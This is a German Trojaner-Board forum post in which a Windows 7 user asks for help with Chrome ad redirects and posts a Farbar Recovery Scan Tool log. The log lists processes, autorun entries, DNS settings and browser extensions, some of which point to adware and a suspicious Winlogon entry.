Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Windows 7: Webseiten werden auf Werbung umgeleitet (https://www.trojaner-board.de/175011-windows-7-webseiten-werbung-umgeleitet.html)

EisTeeMC 11.01.2016 22:11

Windows 7: Webseiten werden auf Werbung umgeleitet
 
Hallo erstmal,
ich werde seit heute bei fast jeden Mausklick im Browser(Chrome) wird Werbung in einem neuen Tab oder Fenster geöffnet. Selber habe ich es mit meinem AntiVirus Programm AVG und den Adware Remove Tool AdwCleaner probiert, jedoch haben beide nichts gefunden.

Ich hoffe wirklich auf Hilfe und diese möglichst schnell. Dankbar bin ich für jeden der es versucht.

MfG Vadim Sch

Hier die FRST.txt:
Code:

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
durchgeführt von VadimSch (Administrator) auf TRUNIXX (11-01-2016 22:03:13)
Gestartet von C:\Users\VadimSch\Downloads\INTERNET
Geladene Profile: VadimSch (Verfügbare Profile: VadimSch)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgcsrva.exe
(HP) C:\Program Files (x86)\HP SimplePass 2011\TrueSuiteService.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(The Within Network, LLC) C:\Windows\UnsignedThemesSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\AESMSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgwdsvcx.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\47.0.2526.18\remoting_host.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgemca.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\47.0.2526.18\remoting_host.exe
(EasyBits Software AS) C:\Windows\SysWOW64\ezSharedSvcHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Skype Technologies S.A.) C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\alg.exe
(HP) C:\Program Files (x86)\HP SimplePass 2011\TouchControl.exe
(HP) C:\Program Files (x86)\HP SimplePass 2011\BioMonitor.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
() C:\Program Files (x86)\puush\puush.exe
(Spotify Ltd) C:\Users\VadimSch\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Andrea Electronics Corporation) C:\Program Files (x86)\Samson\SoundDeck\SoundDeck.exe
(Comfort Software Group) C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Chicony) C:\Program Files (x86)\Thermaltake Ttesports Ultimate\Ttsystray3.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Easybits) C:\ProgramData\Easybits Magic Desktop for HP\mdhpSUN.exe
() C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Thermaltake) C:\Program Files (x86)\Tt eSPORTS\Tt eSPORTS BLACK\BlackMonitor.exe
(Chicony) C:\Program Files (x86)\Thermaltake Ttesports Ultimate\tTOSD2k1001.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgui.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [557768 2014-10-14] (Adobe Systems Incorporated)
HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2634896 2015-08-07] (NVIDIA Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
HKLM-x32\...\Run: [HP Software Update] => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54576 2008-12-08] (Hewlett-Packard)
HKLM-x32\...\Run: [Easybits Recovery] => C:\Program Files (x86)\EasyBits For Kids\ezRecover.exe
HKLM-x32\...\Run: [AdobeCS5.5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5.5ServiceManager\CS5.5ServiceManager.exe [1523360 2011-01-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [NBKeyScan] => "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM-x32\...\Run: [AdobeCS5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2012-04-18] (Apple Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\Av\avgui.exe [3874216 2015-12-16] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [252848 2012-07-03] (Sun Microsystems, Inc.)
HKLM-x32\...\Run: [Magic Desktop for HP notification] => C:\ProgramData\Easybits Magic Desktop for HP\mdhpSUN.exe [1258504 2013-12-23] (Easybits)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe [2573712 2015-12-12] ()
HKLM-x32\...\Run: [SoundDeck] => C:\Program Files (x86)\Samson\SoundDeck\SoundDeck.exe [2969288 2014-05-19] (Andrea Electronics Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM-x32\...\Run: [Tt eSPORTS BLACK Gaming Mouse] => C:\Program Files (x86)\Tt eSPORTS\Tt eSPORTS BLACK\BlackMonitor.exe [107848 2013-08-01] (Thermaltake)
HKLM-x32\...\Run: [ChallengerUltimate] => C:\Program Files (x86)\Thermaltake Ttesports Ultimate\Ttsystray3.exe [1254912 2010-08-05] (Chicony)
HKLM-x32\...\Run: [ChallengerUltimateOSD] => C:\Program Files (x86)\Thermaltake Ttesports Ultimate\tTOSD2k1001.exe [634880 2010-08-05] (Chicony)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565448 2015-11-12] (LogMeIn Inc.)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguix.exe [1139112 2015-12-08] (AVG Technologies CZ, s.r.o.)
HKLM\...\Winlogon: [Userinit] C:\Windows\system32\userinit.exe,C:\ProgramData\Microsoft\Windows\Start Menu\MSDCSC\msconfig,C:\ProgramData\Microsoft\Windows\Start Menu\MSDCSC\msconfig,C:\Users\VadimSch\Documents\DCSCMIN\lTRk0yNPQbRV\IMDCSC.exe,C:\Users\VadimSch\Documents\DCSCMIN\lTRk0yNPQbRV\IMDCSC.exe
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [Dxtory Update Checker 2.0] => C:\Program Files (x86)\Dxtory Software\Dxtory2.0\UpdateChecker.exe [93696 2010-10-17] (Dxtory Software)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [OscarKeyboard] => "C:\Program Files (x86)\X7 Oscar Keyboard Editor\OscarEditor.exe" Minimum
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [AVG-Secure-Search-Update_0214c] => C:\Users\VadimSch\AppData\Roaming\AVG 0214c Campaign\AVG-Secure-Search-Update-0214c.exe /PROMPT /mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91 /CMPID=0214c
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [se] => C:\Users\user\AppData\Roaming\SkypEmoticons\SE.exe  /minimized
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [puush] => C:\Program Files (x86)\puush\puush.exe [568904 2015-03-30] ()
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [Spotify Web Helper] => C:\Users\VadimSch\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-16] (Spotify Ltd)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3696912 2014-03-04] (Disc Soft Ltd)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2012-04-18] (Apple Inc.)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [SoundDeck] => C:\Program Files (x86)\Samson\SoundDeck\SoundDeck.exe [2969288 2014-05-19] (Andrea Electronics Corporation)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [OscarEditor] => "C:\Program Files (x86)\X7 Oscar Keyboard Editor\\OscarEditor.exe" Minimum
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [FreeAC] => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe [1553688 2014-02-20] (Comfort Software Group)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Run: [GoogleChromeAutoLaunch_AF37F0224DD9816CC0C35BFDDEE1D0FB] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [741704 2015-12-11] (Google Inc.)
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\MountPoints2: {a852a3bf-1fb4-11e1-99c2-806e6f6e6963} - E:\acer.exe
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\MountPoints2: {d54529dd-301c-11e3-a904-2c4138a47b93} - H:\iLinker.exe
AppInit_DLLs: C:\PROGRA~2\GSSUPP~1\ASSIST~2.DLL => C:\Program Files (x86)\GS Supporter\Assistant_x64.dll [2759168 2013-12-30] ()
Startup: C:\Users\VadimSch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ttsystray3.exe - Verknüpfung.lnk [2015-01-18]
ShortcutTarget: Ttsystray3.exe - Verknüpfung.lnk -> C:\Program Files (x86)\Thermaltake Ttesports Ultimate\Ttsystray3.exe (Chicony)
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{1ACD5454-84FF-4F6D-BF22-E2D07F413576}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{B5DB6E08-ACA8-4BE0-98D7-E1B0B5023D10}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{BB7D1F73-8C8F-402A-8924-087AF512E308}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{CDBC9E46-499B-4C9F-AB1B-0D426FAAC889}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{CDBC9E46-499B-4C9F-AB1B-0D426FAAC889}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{DA635C4D-0A66-461D-9706-235438162A6B}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{DA635C4D-0A66-461D-9706-235438162A6B}: [DhcpNameServer] 82.163.142.3

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.uk.msn.com/HPDSK/4
SearchScopes: HKLM -> DefaultScope Wert fehlt
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM -> {52CB6891-7300-49D4-AF58-DF63EECAE469} URL = hxxp://www.amazon.de/s/ref=azs_osd_ieade?ie=UTF-8&tag=hp-de1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/707-111076-19270-2/4?mpre=hxxp://shop.ebay.com/?_nkw={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope Wert fehlt
SearchScopes: HKLM-x32 -> {52CB6891-7300-49D4-AF58-DF63EECAE469} URL = hxxp://www.amazon.de/s/ref=azs_osd_ieade?ie=UTF-8&tag=hp-de1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/707-111076-19270-2/4?mpre=hxxp://shop.ebay.com/?_nkw={searchTerms}
SearchScopes: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> {52CB6891-7300-49D4-AF58-DF63EECAE469} URL = hxxp://www.amazon.de/s/ref=azs_osd_ieade?ie=UTF-8&tag=hp-de1-vsb-21&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> {5919EA19-B210-4890-8680-CF4E9AC51831} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYDE&apn_uid=54E55EC5-CE02-43E7-A046-AF7EE279E436&apn_sauid=4BAFA838-2621-42AA-8C07-C80F6B07BEBD
SearchScopes: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> {5D45CBA5-FEF3-4E08-9A07-6C76DF111CD7} URL = hxxp://www.delta-search.com/?q={searchTerms}&affID=119816&babsrc=SP_ss&mntrId=0205647002913E26
SearchScopes: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> {68BDB5AE-F45B-4605-9714-38DECB79D70C} URL = hxxp://isearch.avg.com/search?cid={B80782B4-C02B-44CB-9B69-FB93B0CEC764}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&pr=fr&d=2012-09-30 19:56:12&v=14.2.0.1&pid=avg&sg=&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> {71D5E915-82B8-4E19-BB02-5A376466673C} URL = hxxps://de.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=614363&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/707-111076-19270-2/4?mpre=hxxp://shop.ebay.com/?_nkw={searchTerms}
BHO: Plus-HD-3.8 -> {11111111-1111-1111-1111-110311901130} -> C:\Program Files (x86)\Plus-HD-3.8\Plus-HD-3.8-bho64.dll => Keine Datei
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2012-05-05] (Oracle Corporation)
BHO: TrueSuite Website Log On -> {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} -> C:\Program Files (x86)\HP SimplePass 2011\x64\IEBHO.dll [2011-06-09] (HP)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2012-05-05] (Oracle Corporation)
BHO: DVDVideoSoft IE Extension -> {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} -> C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns64.dll [2014-12-15] (DVDVideoSoft Ltd.)
BHO-x32: Lyrics Seeker -> {14a771cd-f066-4d65-8e98-b0d5eb237c81} -> C:\Program Files (x86)\LyricsSeeker\133.dll => Keine Datei
BHO-x32: TrueSuite Website Log On -> {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} -> C:\Program Files (x86)\HP SimplePass 2011\IEBHO.dll [2011-06-09] (HP)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: DVDVideoSoft IE Extension -> {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} -> C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns.dll [2014-12-15] (DVDVideoSoft Ltd.)
Toolbar: HKU\S-1-5-21-3405180731-3880776032-2862364969-1001 -> Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  Keine Datei
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\VadimSch\AppData\Roaming\Mozilla\Firefox\Profiles\0lzdlwjs.default
FF Homepage: hxxp://mysearch.avg.com?pid=safeguard&sg=&cid=%7Bbc0077e4-779f-439e-a638-56cd0f325ba8%7D&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&ds=AVG&coid=avgtbavg&cmpid=&v=17.3.1.91&lang=de&pr=fr&d=2014-03-17%2014%3A09%3A03&sap=hp
FF NetworkProxy: "type",
FF DefaultSearchEngine: Yahoo!
FF SelectedSearchEngine: Yahoo!
FF Keyword.URL: hxxps://de.search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=614363&p=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-29] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=10.4.0 -> C:\Windows\system32\npDeployJava1.dll [2012-05-05] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.4.0 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2012-05-05] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-29] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin-x32: @esn/npbattlelog,version=2.3.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.1\npbattlelog.dll [Keine Datei]
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=10.11.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-01-31] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\new_plugin\npjp2.dll [Keine Datei]
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-05-04] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Keine Datei]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41105.0\npctrl.dll [2015-11-04] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-07] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-07] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-02] (Google Inc.)
